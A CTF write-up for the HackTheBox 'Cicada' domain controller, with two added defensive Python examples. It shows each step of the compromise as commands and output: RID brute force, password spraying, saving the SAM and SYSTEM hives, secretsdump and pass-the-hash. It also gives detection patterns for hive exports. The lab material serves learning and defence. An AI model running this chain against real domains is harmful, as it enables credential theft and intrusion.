Cicada - HackTheBox
CTF Writeup for Cicada from HackTheBox

Based on enabled Guest account and bad AD user permissions.
Starting with an nmap scan..
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
57262/tcp open unknown syn-ack ttl 127
From the output we can pull the domain name 'cicada.htb' out of the certificates. The box is 'CICADA-DC'.
Checking SMB shares with anonymous access..
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB shares
Anonymous access to the DEV share is blocked, but HR is open.
smb: \> ls
. D 0 Thu Mar 14 14:29:09 2024
.. D 0 Thu Mar 14 14:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 20:31:48 2024
SMB's HR share
Checking the txt file we find a password.
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: ********
... snip ...
Best regards,
Cicada Corp
Now that we have a password, we need some usernames to go with it. Since there is no website hosted on the box, we have to fall back to AD enumeration.
Checking anonymous and Guest access..
user@c2:~:$ netexec smb cicada.htb -u '' -p '' --shares
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [+] cicada.htb\:
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
Anonymous access denied
user@c2:~:$ netexec smb cicada.htb -u 'Guest' -p '' --shares
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [+] cicada.htb\Guest:
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [*] Enumerated shares
SMB xxx.xxx.xxx.xxx 445 CICADA-DC Share Permissions Remark
SMB xxx.xxx.xxx.xxx 445 CICADA-DC ----- ----------- ------
SMB xxx.xxx.xxx.xxx 445 CICADA-DC ADMIN$ Remote Admin
SMB xxx.xxx.xxx.xxx 445 CICADA-DC C$ Default share
SMB xxx.xxx.xxx.xxx 445 CICADA-DC DEV
SMB xxx.xxx.xxx.xxx 445 CICADA-DC HR READ
SMB xxx.xxx.xxx.xxx 445 CICADA-DC IPC$ READ Remote IPC
SMB xxx.xxx.xxx.xxx 445 CICADA-DC NETLOGON Logon server share
SMB xxx.xxx.xxx.xxx 445 CICADA-DC SYSVOL Logon server share
Guest access allowed
Now that we know the Guest account is enabled to some capacity, maybe we can enumerate users by RID brute force.
user@c2:~:$ netexec smb cicada.htb -u 'Guest' -p '' --rid-brute
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [+] cicada.htb\Guest:
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
... snip ...
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
classic rid brute force
Now with the list of users, lettuce spray the AD..
user@c2:~:$ netexec smb cicada.htb -u ~/Downloads/users.txt -p '********' --users
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [-] cicada.htb\john.smoulder:******** STATUS_LOGON_FAILURE
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [-] cicada.htb\sarah.dantelia:******** STATUS_LOGON_FAILURE
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [+] cicada.htb\michael.wrightson:********
SMB xxx.xxx.xxx.xxx 445 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
SMB xxx.xxx.xxx.xxx 445 CICADA-DC Administrator 2024-08-26 20:08:03 667 Built-in account for administering the computer/domain
SMB xxx.xxx.xxx.xxx 445 CICADA-DC Guest 2024-08-28 17:26:56 0 Built-in account for guest access to the computer/domain
SMB xxx.xxx.xxx.xxx 445 CICADA-DC krbtgt 2024-03-14 11:14:10 0 Key Distribution Center Service Account
SMB xxx.xxx.xxx.xxx 445 CICADA-DC john.smoulder 2024-03-14 12:17:29 2
SMB xxx.xxx.xxx.xxx 445 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 2
SMB xxx.xxx.xxx.xxx 445 CICADA-DC michael.wrightson 2024-03-14 12:17:29 0
SMB xxx.xxx.xxx.xxx 445 CICADA-DC david.orelious 2024-03-14 12:17:29 0 Just in case I forget my password is ********
SMB xxx.xxx.xxx.xxx 445 CICADA-DC emily.oscars 2024-08-22 21:20:17 0
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [*] Enumerated 8 local users: CICADA
We now have the list of groups/users within the CICADA AD and, strangely, a supposed password for the user 'david.orelious' sitting in his account description field.
Now that we have two AD users, I'm going to check the SMB 'DEV' share permissions..
user@c2:~:$ netexec smb cicada.htb -u 'michael.wrightson' -p '********' --shares
... snip ...
SMB xxx.xxx.xxx.xxx 445 CICADA-DC Share Permissions Remark
SMB xxx.xxx.xxx.xxx 445 CICADA-DC ----- ----------- ------
SMB xxx.xxx.xxx.xxx 445 CICADA-DC ADMIN$ Remote Admin
SMB xxx.xxx.xxx.xxx 445 CICADA-DC C$ Default share
SMB xxx.xxx.xxx.xxx 445 CICADA-DC DEV
SMB xxx.xxx.xxx.xxx 445 CICADA-DC HR READ
... snip ...
SMB 'michael.wrightson' share access
user@c2:~:$ netexec smb cicada.htb -u 'david.orelious' -p '********' --shares
... snip ...
SMB xxx.xxx.xxx.xxx 445 CICADA-DC Share Permissions Remark
SMB xxx.xxx.xxx.xxx 445 CICADA-DC ----- ----------- ------
SMB xxx.xxx.xxx.xxx 445 CICADA-DC ADMIN$ Remote Admin
SMB xxx.xxx.xxx.xxx 445 CICADA-DC C$ Default share
SMB xxx.xxx.xxx.xxx 445 CICADA-DC DEV READ
SMB xxx.xxx.xxx.xxx 445 CICADA-DC HR READ
... snip ...
SMB 'david.orelious' share access
David has access to the 'DEV' share..
smb: \> ls
. D 0 Thu Mar 14 14:31:39 2024
.. D 0 Thu Mar 14 14:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 20:28:22 2024
SMB's DEV share
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "********" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
Backup_script.ps1
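Every foothold so far came from a secret left in plain text: the HR notice, david.orelious's account description, and this backup script. As an added example (not the box's script or any tool's code), here is a small Python scanner for those three patterns; the sample inputs are constructed and the PLACEHOLDER_* values are assumed stand-ins for the redacted passwords.

```python
import re
# Patterns for credentials left in plain text, one per leak vector seen on this
# box: a "default password is:" notice, an account description that says
# "my password is", and a PowerShell script wrapping a literal password in
# ConvertTo-SecureString -AsPlainText (or assigning it to a $password variable).
PATTERNS = [
    ("powershell-securestring",
     re.compile(r'ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText', re.I)),
    ("powershell-variable",
     re.compile(r'\$(?:pass(?:word|wd)?|pwd|secret)\s*=\s*"([^"]+)"', re.I)),
    ("prose-password",
     re.compile(r'password\s+(?:is|:)\s*:?\s*(\S+)', re.I)),
]

def redact(secret):
    """Keep two characters so a hit can be triaged without copying the secret."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "**"

def find_plaintext_credentials(text):
    """Return (line_number, pattern_name, redacted_secret) for each line that hits."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pat in PATTERNS:
            m = pat.search(line)
            if m:
                hits.append((lineno, name, redact(m.group(1))))
                break  # one finding per line is enough
    return hits

# Constructed samples shaped like the three artefacts on this box; PLACEHOLDER_*
# stand in for the redacted passwords.
SAMPLE_SCRIPT = r"""$sourceDirectory = "C:\smb"
$username = "backup.svc"
$password = ConvertTo-SecureString "PLACEHOLDER_PW1" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
Compress-Archive -Path $sourceDirectory -DestinationPath "D:\Backup\out.zip"
"""
SAMPLE_NOTICE = "Welcome aboard!\nYour default password is: PLACEHOLDER_PW2\nBest regards"
SAMPLE_DESCRIPTION = "Just in case I forget my password is PLACEHOLDER_PW3"

if __name__ == "__main__":
    import sys
    sources = {"script": SAMPLE_SCRIPT, "notice": SAMPLE_NOTICE, "description": SAMPLE_DESCRIPTION}
    for path in sys.argv[1:]:  # files given on the command line (e.g. scripts pulled off a share) are scanned too
        with open(path, encoding="utf-8", errors="replace") as fh:
            sources[path] = fh.read()
    for label, text in sources.items():
        for lineno, name, secret in find_plaintext_credentials(text):
            print(f"{label}:{lineno}: {name} -> {secret}")
```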
We now have credentials for the user 'emily.oscars'. Unlike the other two, she has WinRM access.
user@c2:~:$ netexec winrm cicada.htb -u 'emily.oscars' -p '********'
... snip ...
WINRM xxx.xxx.xxx.xxx 5985 CICADA-DC [+] cicada.htb\emily.oscars:******** (Pwn3d!)
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
> ********************************
user.txt
Checking our privileges (whoami /priv)..
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
The SeBackupPrivilege/SeRestorePrivilege, ruh roh.
Since we are taking over this one machine, the local 'Administrator' account will do.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Downloads> reg save hklm\sam sam
> The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Downloads> reg save hklm\system system
> The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Downloads> download sam
> Info: Downloading C:\Users\emily.oscars.CICADA\Downloads\sam to sam
> Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Downloads> download system
> Info: Downloading C:\Users\emily.oscars.CICADA\Downloads\system to system
> Info: Download successful!
dump sam and system
user@c2:~:$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: *********
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:********:********:::
Guest:501:********:********:::
DefaultAccount:503:********:********:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
secretsdump
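The hive dump above leaves two clear traces in Windows Security auditing: a 4672 logon carrying SeBackupPrivilege for a user who should not hold it, and a 4688 process creation for reg.exe saving a hive (the latter needs command-line auditing enabled). Added detection example, not part of the original writeup, run over constructed events; the allow-list of expected accounts is an assumption to tune per domain.

```python
import re
# Constructed sample records, not real telemetry: the fields a SIEM extracts from
# Windows Security event 4688 (process creation, command-line auditing enabled)
# and 4672 (special privileges assigned to new logon), mirroring the chain above.
SAMPLE_EVENTS = [
    {"EventID": 4672, "SubjectUserName": "CICADA-DC$",
     "PrivilegeList": "SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege"},
    {"EventID": 4672, "SubjectUserName": "emily.oscars",
     "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege"},
    {"EventID": 4688, "SubjectUserName": "emily.oscars",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\sam sam"},
    {"EventID": 4688, "SubjectUserName": "emily.oscars",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg save "HKEY_LOCAL_MACHINE\SYSTEM" system'},
    {"EventID": 4688, "SubjectUserName": "john.smoulder",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query hklm\software\microsoft"},
]

# Accounts expected to hold backup/restore rights (assumed list; tune per domain).
EXPECTED_BACKUP_OPERATORS = {"administrator"}

# reg.exe "save" of the SAM, SYSTEM or SECURITY hive under either HKLM spelling.
HIVE_EXPORT = re.compile(
    r"\bsave\b.*?(?:hklm|hkey_local_machine)\\(sam|system|security)\b", re.I)

def is_hive_export(event):
    """True for a 4688 where reg.exe exports a credential-bearing hive."""
    image = event.get("NewProcessName", "").lower()
    return image.endswith("\\reg.exe") and bool(
        HIVE_EXPORT.search(event.get("CommandLine", "")))

def is_unexpected_backup_privilege(event):
    """True for a 4672 giving SeBackup/SeRestorePrivilege to a non-machine, unexpected account."""
    user = event.get("SubjectUserName", "")
    if user.endswith("$") or user.lower() in EXPECTED_BACKUP_OPERATORS:
        return False
    privs = event.get("PrivilegeList", "")
    return "SeBackupPrivilege" in privs or "SeRestorePrivilege" in privs

def detect(events):
    alerts = []  # one human-readable alert per matching event, in input order
    for e in events:
        if e["EventID"] == 4688 and is_hive_export(e):
            alerts.append(f"hive-export by {e['SubjectUserName']}: {e['CommandLine']}")
        elif e["EventID"] == 4672 and is_unexpected_backup_privilege(e):
            alerts.append(f"backup-privilege logon by {e['SubjectUserName']}")
    return alerts
```

Pairing the two signals (privilege granted, then hive saved by the same account within a short window) is what makes this worth paging on; either alone is noisy on a DC where backup software legitimately does both.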
Now that we have the local Administrator account hash, we can pass the hash (PtH) into Evil-WinRM.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
> ********************************
root.txt
That's all (: